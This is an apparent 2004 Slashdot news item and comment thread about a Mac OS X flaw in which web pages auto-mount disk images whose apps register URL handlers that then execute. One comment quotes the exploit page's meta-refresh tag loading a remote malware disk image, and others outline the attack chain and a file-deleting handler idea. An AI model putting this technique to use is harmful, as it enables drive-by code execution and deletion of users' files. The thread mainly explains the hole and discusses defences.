Yet Another Mac OS X Protocol Handler Exploit

Rosyna writes "Apple just can't get any breaks lately. First the help protocol handler exploit (which has been fixed), then the telnet handler exploit, and now an exploit for any arbitrary protocol handler: make your own, then exploit it. You can auto mount a volume in Mac OS X via the disk, afp, or ftp handlers (and probably others). Paranoid Android will help prevent exploitation until Apple fixes the problem." The hole here is that when a volume with an application on it is mounted, Apple registers the application's specified protocol handlers, without additional user action. Another option is to disable those handlers that allow volume mounting, but playing that game, obviously, isn't a guaranteed win in the long run.

MS influence?

What'd they do, hire the security team away from Microsoft?

Re:MS influence?

[rspress]

At Microsoft is one person considered a team?

Fear Bill G, Fear!

[Councilor+Hart]

Wow, if I were Billy boy, I would start worrying now.
First, there is al this talk of switching to linux.
And now even the virus writers are starting to pay attention to something else besides windows.
Finally the end is near.
Goodbye Billy...

On the other hand, I do use Mac OS X.
D'Oh...

As an Apple Afficionado, I'm delighted.

I love my Apple computers and I adore OS X.

That said, I'm immensley releived the floodgates to OS X exploitation have finally been thrown open.

Allow me to explain.

Too long Apple users have gloated (senselessley) that OS X is somehow more secure than Windows. This collective delusion has lulled everyone into a false sense of security. Being one of the few who bothers to "secure" his OS X installation, I am often jeered at for being paranoid - uneccesarily so, according to my detractors.

But the truth is that no software sytem is perfect. This is the wake-up call Apple and its users to realise they need to watch out too. I relish this because taking action *now* too purge OS X of its deficiencies will prevent the pitiful scene common to Windows users. I don't want OS X exploited on a daily basis as happens with Windows. I want OS X to be secure!

There will be much displeasure in the short-term, but that which does not kill us only makes us stronger.

Re:As an Apple Afficionado, I'm delighted.

[yotaku]

Absolutely. And the same thing would happen with any other OS that was setup and used by anyone not in the computer elite. There will always be holes in the OS. But given careful administration, most are not too much of a problem. This is true for OS X, Windows, and *nix.

I just hope, as you say that it will shut the Mac fans up about their "immune OS that will never suffer from security holes as windows does". Guess what, it will - and has.

Re:As an Apple Afficionado, I'm delighted.

I did not realize that "being secure" was a boolean.

Too long Apple users have gloated (senselessley) that OS X is somehow more secure than Windows

So something is either completely secure (along the lines of OpenBSD), or it is as open as Windows. And there is no middle ground there?

Even with the current exploits, OS X is still significantly more secure than most Windows installs.

Yes, I agree that OS X users need to take precautions and not just rely on the security of their machine. Even then, though, you can tell someone deciding between OS X and Windows "If you are reasonable careful on both platforms, you are still less likely to have problems with OS X, due to its security already in place."

Re:As an Apple Afficionado, I'm delighted.

[Jord]

I love the way this comment was presented. Sounds like some finely crafted FUD more than anything else. Yes an exploit has been found in OSX. Does that make OSX as vulnerable as Windows, not even close, not even on the same planet.

Windows has had so many exploits that I can't even keep track. One exploit, not even a root exploit (a very important distinction) does not make OSX as vulnerable as Windows. There still are no worms, no viruses attributed to OSX.

Yes this was due. It was going to happen. But OSX is still infinitely more secure than windows and more than likely always will be. Lets not fly off half-cocked and make wild statements like this.

Re:As an Apple Afficionado, I'm delighted.

[mikedaisey]

I agree with your sentiment--I want a secure system, and seeing it challenged early will help it be so. But the fact of the matter is that OSX ships by default many degrees of magnitude more secure than Windows does.

Yes, this has resulted in some unnecessary gloating from Macheads, and it makes folks lazy with their security--that's unfortunate. But that doesn't diminish the security successes Apple's had with OS X.

Re:As an Apple Afficionado, I'm delighted.

[Jord]

I suggest you take a look at track records before spouting off about who is better at what.

I am not saying that OS X is perfect. Far from it, I am a programmer myself and I understand the realities of software design. However based on track records alone, OS X is far ahead of even the most current windows implementation. How many exploits are there that auto install software on OS X? None. How many worms are there for OS X? None. How many pieces of auto-installing spyware are there for OS X? None. How many viruses? None. OS X IS more secure that windows. It's not perfect but I will put my money behind the security in OS X any day.

In any event, it was completely expected that the Windows zealots would come out of the woodwork as soon as the first vulnerability was found in OS X. Now it begins. We will see plenty of zealots crying how no operating system is safe. Guess what, windows is still a poorly written piece of garbage and no amount of throwing mud (or fud) is going to change that.

Re:As an Apple Afficionado, I'm delighted.

[Jord]

The large audience argument has been mentioned many many times in the past and personally I disagree with it. There is a real world example of this exact situation. Microsoft IIS. It's "market percentage" is very tiny and yet it gets hit with worms because it is insecure. On the other hand, Apache which has a huge market percentage does not get it because it is secure.

Granted this is dumbing down the details by a HUGE amount but the point is still there. Microsoft software does not have the most worms/viruses/etc because it has the most market share, it has the most worms/viruses/etc because it is the most poorly written. Granted, if their market share was zero, then obviously the exploits would not be big news, but the clear point that is made is that if OS X were as vulnerable as Windows we would be seeing worms and viruses. The fact that there are none reported goes a long way to show the strength of the operating system.

BTW you could easily replace OS X with BSD, Linux in this statement and the statement still holds true. Software written with security in mind is clearly more secure. Windows was clearly not written with security in mind.

This is a Launch Services exploit

[mst76]

For more information, see the Carbon docs, in particular, the section "Registering Applications":

The Finder automatically registers all applications as it becomes aware of them, such as when they are dragged onto the user's disk or when the user navigates to a folder containing them.

and as we see with this exploit, whenever a volume is mounted. Doh! This is one of those handy MacOS features where the OS seems to find the right application as if by Magic even when the app is moved around. In this case though, it appears that too much Convenience has compromised Security. We can't really blame them though, I think this behaviour was inherited from Classic MacOS, before everyone was networked, and before security was such a big issue as it is today. The real test of Apple is how long it will take them to fix this hole.

Re:This is a Launch Services exploit

[aristotle-dude]

This is not a launch services exploit. Get your facts straight. It is an exploit that uses the disk protocol in conjunction with the Launch services "Registering Applications" feature. Application registration is a feature that I do not want to see disappear.

I would like to Apple to add a mandatory confirmation dialogue with warnings about possible security risks from mounting images from untrusted sources on any attempt to mount a disk image from the internet.

This would give the user ample warning and a chance to prevent the exploit.

Another alternative would be to do the above and include the option in the security prefs pane to enable/disable mounting of internet disk images.

It just works!

[OneDeeTenTee]

Seriously though, once Linux becomes a real choice for average desktop users we'll be seeing Linux exploits as well.

Resetting "help:" to Help Viewer

[TomSawyer]

I'm posting this in case I'm not the only one who ran into trouble resetting "help:" to the Help Viewer. Before the security update came out I'd set the "help:" protocol to point to chess. If you want to point "help:" back to the Help Viewer you'll find the app in /System/Library/CoreServices/

Fire up MisFox again and update the help protocol helper to /System/Library/CoreServices/Help Viewer.app

How this hole was discovered

[mst76]

This issue was discovered on the MacNN forum, when they were discussing the previous exploit. The accepted workaround was downloading one of the utilities to change the protocol helpers, but the user kampl refused to have any non-Apple "security fix" on his system (He never acknowledged that the utilities were not sucurity fixes at all, just tools to change user preferences). His solution was to delete the HelpViewer app from his system. One bright member of the forum pointed out that that isn't enough, you could probably just stick the HelpViewer on the .dmg image and LaunchServices would find it there. Another poster realized this might work for any application if you bind it to a bogus protocol in the Info.plist file, so there is no need for HelpViewer at all. A third poster had a sample exploit coded in no time. Apple was promptly notified, so we can expect another fix soon (hopefully).

Re:How this hole was discovered

[Fulkkari]

I'm a bit amazed on how well the Mac community have co-operated in finding these security flaws. Even though the flaws are always bad things, this just shows how strong the community actually is. And it sure feels good to be a part of it.

Re:How this hole was discovered

[Midnight+Thunder]

this just shows how strong the community actually

It does, but it also shows the importance of community. This is one thing that I feel should be taken into account when creating a product. If you can create a community around your product then people will dicuss what they like, what they don't like and generally people will talk about your product. All this needs be, to start with, is a help forum will provision for generalised discussion. If people are part of the community then they are likely to help push the product.

Also uses meta-refresh

[tbmaddux]

The Finder automatically registers all applications as it becomes aware of them, such as when they are dragged onto the user's disk or when the user navigates to a folder containing them.

and as we see with this exploit, whenever a volume is mounted.

IMO the volume should never be downloaded or mounted. The exploit page includes the following:

<meta HTTP-EQUIV="refresh" content="0; URL=disk://www.geekspiff.com/unlinkedCrap/osxMalwa re.dmg">

So first off this is another exploit of the "disk:" protocol handler. The arbitrary protocol depends on the automatic download and mounting of that DMG file through the handler. It's definitely a security hole for that volume to get auto-mounted through meta-refresh, and I question whether it should even be downloaded. At a bare minimum the download should obey the preferences set in Safari about whether or not to open "safe" downloads, and disk image autorun upon mounting should be deactivateable (if not disabled entirely).

Re:Also uses meta-refresh

[Graymalkin]

The disk: protocol is designed to automount images off the web, that is why it exists in the first place. Developers can offer up images off their sites users can mount directly so there's no need to download the image, install the app, and delete the image. Once the app is installed the user can just unmount it. It is a nice functionality but Apple needs to sandbox the process since an image mounted off the web should be untrusted.

Re:Also uses meta-refresh

[steeviant]

Actually, this IS an exploit.

Using this technique, an attacker can cause a disk image to open on your machine, the OS will then faithfully install any arbitrary URL handlers that applications on that disk image say they can handle (for example a deletefile: URL handler), then the same website can forward you to a deletefile://~ URL, thus deleting your home directory.

While it would be easy to tell that the web site is opening a disk image, and the application it starts would probably appear in the Dock, it doesn't make it easy to prevent the Application on the disk image from being executed using this method.

Much Ado About Not Much...

[lgw4]

I think this is mainly a PR stunt.

<quote>

Sample Exploit

Ive written a sample exploit that delivers and executes its payload without user intervention and operates by registering its own URL scheme handler. Until Paranoid Android, there was no way of protecting against this attack, which freaked me out enough to write Paranoid Android.:)

If you click the sample exploit link below, heres what will happen:

• A disk image named MalwareDiskImage will be mounted on your desktop.
• LaunchServices will read the Info.plist file of the application in this disk image automatically, and register the application as the default handler for URLs with a 'malware' scheme.
• The webpage will wait 10 seconds, and then redirect to malware:unused, causing LaunchServices to launch the payload application within the disk image.
• The application within the disk image will write a text file to the users home directory called owned.txt explaining that the machine has been exploited, will present an alert to the user, and will eject the disk image.

Because this sample exploit registers its own URL scheme, none of the methods people had been using involving disabling certain scripts, moving Help.app or changing the 'help' URL scheme would protect against it. At this time, only Paranoid Android provides protection from it.

benign sample exploit -->innocousPage.html

Portions of this sample exploit are based heavily on a prior sample exploit at insecure.ws Conclusions

Until Apple fixes this vulnerability, you should install Paranoid Android and surf safely.

Copyright Jason Harris, 2004, All Rights Reserved

</quote>

I'm using 10.3.3 and when I click on the sample exploit URI, nothing happens -- nothing. I've tried this thing 10+ times, scoured my HD for "owned.txt" and can find nothing. Of course, I installed the RCDefaultApp PreferencePane a couple of days ago and had already followed the suggestions posted by John Gruber on http://daringfireball.net but since Paranoid Android is the ONLY thing that can protect against this exploit, I'm at a loss as to explain why my machines aren't affected.

Re:Much Ado About Not Much...

[Rosyna]

the sample exploit is only for disk.

Try one of these if you are so confident this is a PR stunt: http://ozwix.dk/OpnAppFixer/testit.html

Re:Maybe I'm missing something

[HeghmoH]

No, that's not it at all. They're saying is that if you visit a properly-constructed web page, that page can cause your computer to execute arbitrary code without any further intervention on your part. You just go to the URL, and a few seconds later you've been owned.

Re:Alright

[Jord]

how many times have you downloaded something from Safari, to have it automount, and even run the installer?

Hmmm...Never. I have had Safari automount more disk images than I can count. Some of them have a EULA auto pop-up but never have I seen one run the installer automatically. If that were to happen, we would have seen a trojan on OSX a lot sooner.

Re:More Shoes

[Amiga+Lover]

Can't trojans that get onto Macs turn into bona-fide worms, distributing themselves via Address Book and HTML e-mail that does the 'disk://' download?

Theoretically yes.

It's certainly possible to click on a link and have it run code that emails everyone in your address books with a mail that also has that same link in it. That would spread the link to many other people, many of whom would click on it.

However as yet the code only runs in userland and can stay executing no longer than a current session. rebooting will kill it and it won't come back unless clicked again. Because of that its ability to drop a payload that will be useful later to intrude on the machine is limited.

The workarounds available at the moment

[theolein]

There are a number of workarounds at the moment:

1. The best is Paranoid Android linked to in the article itself. PA itself uses the APE kernel extension from Unsanity, however, and some people have reported problems with this.

2. Another method is to use Internet Exploere, MisFox or MoreInternet to set the following protocol helpers which can mount volumes, to point to an innocuous application, such as Chess.
fpt:
afp:
disk:
disks:

3. In a public environment where there are some automatcially mounted network shares such as in a university, school or company, you would also have to take into account protocols such as:
nfs:
webdav:
smb:
cifs:
but these are less likey to be used in conjunction with this vulnerability as it would be more difficult to get one of these users to simultaneously go to a webpage that exploits this.

The reaction of my friends

[Go+Aptran]

My Windows using friends keep calling and consoling me... I think they expect me to kill myself, or something.

Re:Same thing

[prockcore]

That's it. No web page can exploit this arbitrary protocol problem if you do step 1 above. Step 2 fixes the help: issue, and step 3 fixes all other known issues.

Why does this warrant 4 stories in 4 days?

It warranted 4 stories in 4 days because people like you misunderstand the problem.

Step 1 doesn't fix anything.. disk: ftp: afp: protocols still allow automounting of volumes from a webpage.

Step 2 fixes help and telnet, but those aren't the whole issue.

Step 3 is a step in the right direction, but you'll also need to disable ftp: and afp: since they both can be used in the same way.

Disabling ftp means you can't open any ftp volumes without jumping through hoops. I always thought it was stupid that safari didn't handle ftp directly though.

The solution isn't an easy one, and Apple is going to have to do something that MS and Linux have dealt with in the past... sacrifice ease-of-use for security.

Re:Maybe I'm missing something

[HeghmoH]

Funny, how these assumptions happen.

I'm a Mac owner. I've owned nothing but Apple computers, first an Apple IIGS then a series of Macs. I love them, and I think Apple is great. But that doesn't prevent me from facing reality.

The fact is, it doesn't matter if "only" your user account is compromised, and root remains secure. What can a trojan possibly do to your computer that you don't want it to do? It can delete files, spy on you, and proxy spam or other malicious network connections. It can do all of this with "only" your user account. You don't have to be root to proxy anything. You don't have to be root to run a keylogger or run a heuristic that greps for credit card numbers. You don't have to be root to trash all of the files in your home directory, which should be the only ones you care about. Who cares if the trojan can't trash the stuff in /System? You can get that off of a CD in half an hour. It's the documents, pictures, movies, and music that you have that are difficult to replace, and owning your user account is enough for a virus to destroy them.

The unix permissions model is great on multiuser systems, but on a home desktop it really just doesn't help that much. It's nice, but it fails to protect that which I care most about.